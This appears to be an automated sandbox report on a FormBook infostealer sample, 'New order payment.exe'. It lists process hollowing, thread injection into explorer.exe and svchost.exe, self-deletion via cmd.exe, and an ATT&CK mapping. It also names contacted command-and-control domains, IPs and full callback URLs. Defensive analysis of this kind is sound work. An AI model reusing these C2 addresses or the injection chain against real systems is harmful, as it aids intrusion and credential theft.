          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00409B30 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.hanansalman.com
          Source: C:\Windows\explorer.exeDomain query: www.sejiw3.xyz
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeNetwork Connect: 137.184.31.35 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeDomain query: www.srchwithus.online
          Source: C:\Windows\explorer.exeDomain query: www.heyunshangcheng.info
          Source: C:\Windows\explorer.exeNetwork Connect: 51.210.240.92 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.67.234.155 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.241.55.103 80
          Source: C:\Windows\explorer.exeDomain query: www.christinegagnonjewellery.com
          Source: C:\Windows\explorer.exeDomain query: www.mykombuchafactory.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.salvationshippingsecurity.com
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\New order payment.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 9B0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\New order payment.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New order payment.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New order payment.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\New order payment.exeMemory written: C:\Users\user\Desktop\New order payment.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New order payment.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New order payment.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\New order payment.exeProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.280314359.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510241 Sample: New order payment.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 31 www.rbrituelbeaute.com 2->31 33 www.pronogtiki.store 2->33 35 3 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 9 other signatures 2->49 11 New order payment.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\fsfowpfjd.dll, PE32 11->29 dropped 63 Injects a PE file into a foreign processes 11->63 15 New order payment.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 srchwithus.online 137.184.31.35, 49792, 80 PANDGUS United States 18->37 39 salvationshippingsecurity.com 51.210.240.92, 49755, 80 OVHFR France 18->39 41 13 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 svchost.exe 18->22         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 22->55 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          New order payment.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.New order payment.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.New order payment.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.2.New order payment.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.New order payment.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.New order payment.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.New order payment.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          14.2.svchost.exe.3015000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.New order payment.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.1.New order payment.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.New order payment.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.0.New order payment.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.New order payment.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.2.svchost.exe.3d3796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.New order payment.exe.f020000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.crisisinterventionadvocates.com/u9xn/0%Avira URL Cloudsafe
          http://181ue.com/sq.html?entry=0%Avira URL Cloudsafe
          http://www.sejiw3.xyz/u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n100%Avira URL Cloudphishing
          http://www.hanansalman.com/u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n0%Avira URL Cloudsafe
          http://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n0%Avira URL Cloudsafe
          http://www.itskosi.com/u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n0%Avira URL Cloudsafe
          http://www.salvationshippingsecurity.com/u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n0%Avira URL Cloudsafe
          http://www.heyunshangcheng.info/u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n0%Avira URL Cloudsafe
          http://www.crisisinterventionadvocates.com/u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          srchwithus.online
          		137.184.31.35
          		truetrue
            		unknown
            www.itskosi.com
            		3.67.234.155
            		truetrue
              		unknown
              www.sejiw3.xyz
              		35.241.55.103
              		truefalse
                		unknown
                www.crisisinterventionadvocates.com
                		74.208.236.134
                		truetrue
                  		unknown
                  salvationshippingsecurity.com
                  		51.210.240.92
                  		truetrue
                    		unknown
                    heyunshangcheng.info
                    		34.102.136.180
                    		truefalse
                      		unknown
                      hanansalman.com
                      		160.153.136.3
                      		truetrue
                        		unknown
                        dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com
                        		52.210.179.84
                        		truefalse
                          		high
                          www.pronogtiki.store
                          		5.101.153.216
                          		truefalse
                            		unknown
                            www.hanansalman.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.rbrituelbeaute.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.srchwithus.online
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.heyunshangcheng.info
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.christinegagnonjewellery.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.mykombuchafactory.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.salvationshippingsecurity.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.sfcn-dng.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.umgaleloacademy.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              www.crisisinterventionadvocates.com/u9xn/true
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.sejiw3.xyz/u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4nfalse
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              http://www.hanansalman.com/u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4ntrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4ntrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.itskosi.com/u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4ntrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.salvationshippingsecurity.com/u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4ntrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heyunshangcheng.info/u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4nfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.crisisinterventionadvocates.com/u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4ntrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jssvchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpfalse
                                                		high
                                                http://181ue.com/sq.html?entry=svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://nsis.sf.net/NSIS_ErrorNew order payment.exefalse
                                                  		high
                                                  https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jssvchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpfalse
                                                    		high
                                                    https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpfalse
                                                      		high
                                                      https://hm.baidu.com/hm.js?svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpfalse
                                                        		high
                                                        https://track.uc.cn/collectsvchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpfalse
                                                          		high
                                                          https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jssvchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpfalse
                                                            		high
                                                            http://nsis.sf.net/NSIS_ErrorErrorNew order payment.exefalse
                                                              		high

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              3.67.234.155
                                                              		www.itskosi.comUnited States
                                                              		16509AMAZON-02UStrue
                                                              35.241.55.103
                                                              		www.sejiw3.xyzUnited States
                                                              		15169GOOGLEUSfalse
                                                              137.184.31.35
                                                              		srchwithus.onlineUnited States
                                                              		11003PANDGUStrue
                                                              160.153.136.3
                                                              		hanansalman.comUnited States
                                                              		21501GODADDY-AMSDEtrue
                                                              34.102.136.180
                                                              		heyunshangcheng.infoUnited States
                                                              		15169GOOGLEUSfalse
                                                              51.210.240.92
                                                              		salvationshippingsecurity.comFrance
                                                              		16276OVHFRtrue
                                                              74.208.236.134
                                                              		www.crisisinterventionadvocates.comUnited States
                                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                              General Information

                                                              Joe Sandbox Version:33.0.0 White Diamond
                                                              Analysis ID:510241
                                                              Start date:27.10.2021
                                                              Start time:16:18:06
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 9m 3s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:New order payment.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:26
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:1
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@7/2@13/7
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 25.3% (good quality ratio 22.9%)
                                                              • Quality average: 74.1%
                                                              • Quality standard deviation: 31.5%
                                                              HCA Information:
                                                              • Successful, ratio: 86%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 20.82.209.183, 131.253.33.200, 13.107.22.200, 23.211.6.115, 23.211.4.86, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235
                                                              • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                              • Not all processes where analyzed, report is missing behavior information

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              3.67.234.155vbc.exeGet hashmaliciousBrowse
                                                              • www.glitchpunks.art/rqan/?FXrTDbp=jnMNyp94RS/IcoH3ZvP/NOH36q1LYo6/R+lq5wFtk9bUimsXlekUNLj3i57DwIz4vqVE&gJ=0r60d
                                                              160.153.136.3LsSAq5zX9w.exeGet hashmaliciousBrowse
